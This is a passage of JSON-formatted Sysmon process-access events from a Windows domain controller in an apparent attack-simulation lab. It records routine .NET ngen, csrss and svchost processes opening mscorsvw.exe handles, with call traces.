ramework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.700","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010D0DE0C00}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7869,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.700\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010D0DE0C00}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.700","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010D0DE0C00}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7870,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010D0DE0C00}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010D0DE0C00}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7871,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.950\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00104EE30C00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.950","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00104EE30C00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7872,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.950\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00104EE30C00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.950","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00104EE30C00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7873,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.966\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00104EE30C00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.966","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00104EE30C00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7874,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.075\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001097E70C00}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.075","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001097E70C00}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7875,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.075\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001097E70C00}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.075","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001097E70C00}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7876,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.075\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001097E70C00}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 